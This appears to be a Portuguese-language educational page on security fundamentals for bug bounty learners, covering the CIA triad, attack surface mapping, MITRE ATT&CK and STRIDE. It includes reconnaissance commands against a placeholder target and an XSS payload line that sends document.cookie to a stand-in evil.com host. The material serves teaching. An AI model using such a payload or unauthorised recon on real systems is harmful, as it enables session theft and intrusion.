Fundamentos de Segurança da Informação

Tríade CIA, threat landscape moderna, attack surface, frameworks de segurança e modelos de maturidade — a base teórica para offensive e defensive security.

Segurança da informação não é apenas "hackear coisas". É compreender como sistemas falham, como atacantes pensam e como construir defesas eficazes. Esta página cobre os fundamentos que sustentam tudo o que vem depois.

A Tríade CIA

O modelo CIA (Confidentiality, Integrity, Availability) é o pilar de toda estratégia de segurança.

Pilar	Objetivo	Exemplo de falha
Confidentiality	Apenas autorizados acessam dados	Vazamento de PII por SQL injection
Integrity	Dados não são alterados indevidamente	Manipulação de parâmetros de preço em e-commerce
Availability	Sistemas acessíveis quando precisam	DDoS derrubando API de pagamentos

Outros princípios importantes

Autenticação — verificar identidade (quem é você?)
Autorização — verificar permissão (o que você pode?)
Não-repúdio — provar que uma ação aconteceu (quem fez isso?)
Least privilege — acesso mínimo necessário
Defense in depth — múltiplas camadas de proteção

Threat Landscape (2024-2026)

Vetores de ataque mais explorados

1. Phishing / Social Engineering     ████████████████████  36%
2. Vulnerabilidades em aplicações web ████████████████     28%
3. Credenciais comprometidas          ████████████         22%
4. Supply chain attacks               ██████               10%
5. Misconfiguração de infraestrutura  ██                    4%

Principais atores de ameaça

Ator	Motivação	Típico alvo
Cybercrime organizado	Financeiro (ransomware, fraude)	Empresas, governo, saúde
State-sponsored	Espionagem, sabotagem	Defesa, infraestrutura crítica
Hacktivistas	Ideologia, protesto	Governo, corporações polêmicas
Insiders	Vingança, ganho financeiro	Própria organização
Bug bounty hunters	Recompensa, aprendizado	Programas de bug bounty

Attack Surface

Attack surface é a soma de todos os pontos onde um atacante pode interagir com seu sistema.

Componentes de attack surface

                    ┌──────────────────┐
                    │  ATTACK SURFACE  │
                    └────────┬─────────┘
           ┌─────────────────┼─────────────────┐
     ┌─────┴─────┐    ┌─────┴─────┐    ┌──────┴──────┐
     │  Digital   │    │  Physical │    │   Social    │
     └─────┬─────┘    └─────┬─────┘    └──────┬──────┘
           │                │                  │
    ┌──────┼──────┐    ┌────┼────┐       ┌─────┼─────┐
    Web  API  DNS  IoT  Docs  USB    Phishing Pretexting
    Apps       Mail     Office         Vishing  Baiting

Mapeamento de attack surface

# Enumeração de subdomínios
subfinder -d target.com -o subdomains.txt

# Verificação de hosts vivos
httpx -l subdomains.txt -o alive.txt

# Port scanning
nmap -iL alive.txt -oN nmap_results.txt

# Fingerprint de tecnologias
whatweb -i alive.txt

# Descoberta de endpoints
gau target.com | uro | sort -u > endpoints.txt

Frameworks de Segurança

Framework	Foco	Quando usar
NIST CSF 2.0	Governança de risco cibernético	Organizações de qualquer porte
ISO 27001	Sistema de gestão de segurança (SGSI)	Compliance, contratos enterprise
MITRE ATT&CK	Táticas e técnicas de adversários	Threat modeling, detecção
OWASP SAMM	Maturidade de segurança de software	Desenvolvimento seguro
CIS Controls	Controles prioritários	Implementação prática

MITRE ATT&CK — Táticas (simplified)

Recon → Resource → Initial → Execution → Persistence → Privilege → Defense → Credential → Discovery → Lateral → Collection → C2 → Exfil → Impact

Tática	Exemplo de técnica
Initial Access	Phishing, exploit de VPN, supply chain
Execution	Command injection, scheduled tasks
Persistence	Web shells, cron jobs, SSH keys
Privilege Escalation	SUID binaries, kernel exploits
Lateral Movement	Pass-the-hash, SSH pivoting
Exfiltration	DNS tunneling, cloud storage

Modelos de Maturidade

CMMI aplicado a segurança

Nível	Descrição	Indicador
1 — Initial	Ad-hoc, reativo	Sem processo definido
2 — Managed	Processos básicos	Scan de vulnerabilidades periódico
3 — Defined	Processos padronizados	SDLC seguro, testes automatizados
4 — Quantitatively Managed	Medido e controlado	Métricas de segurança, bug bounty
5 — Optimizing	Melhoria contínua	Threat hunting, red team contínuo

Conceitos Essenciais para Bug Bounty

Vulnerabilidade vs Exploit vs Payload

Conceito	Definição	Exemplo
Vulnerabilidade	Fraqueza em sistema que pode ser explorada	Input não sanitizado em campo de busca
Exploit	Código/técnica que aproveita a vulnerabilidade	`<script>alert(1)</script>` no campo de busca
Payload	Ação executada após o exploit	`document.location='http://evil.com/?c='+document.cookie`

CWE vs CVE vs CVSS

CWE (Common Weakness Enumeration) — classifica o tipo de fraqueza (ex: CWE-79 = XSS)
CVE (Common Vulnerabilities and Exposures) — identifica uma vulnerabilidade específica (ex: CVE-2024-1234)
CVSS (Common Vulnerability Scoring System) — pontua a severidade (0.0 a 10.0)

CVSS Score	Severidade	Impacto típico em bug bounty
0.1 — 3.9	Low	$100 — $500
4.0 — 6.9	Medium	$500 — $2,000
7.0 — 8.9	High	$2,000 — $10,000
9.0 — 10.0	Critical	$10,000 — $100,000+

Threat Modeling

STRIDE

Ameaça	Sigla	Exemplo prático
Spoofing	Falsificar identidade	Login com credencial roubada
Tampering	Alterar dados	Modificar parâmetro de preço no carrinho
Repudiation	Negar ação	Usuário nega ter feito transferência
Information Disclosure	Vazar dados	Stack trace exposto em erro 500
Denial of Service	Indisponibilizar	ReDoS em campo de regex
Elevation of Privilege	Escalar acesso	User acessa endpoint de admin

DFD (Data Flow Diagram) básico

[Usuário] → (Login) → [API] → (Query) → [DB]
                         ↓
                    (Log) → [SIEM]

Para cada fluxo de dados, pergunte: "Como um atacante poderia manipular, interceptar ou negar esse fluxo?"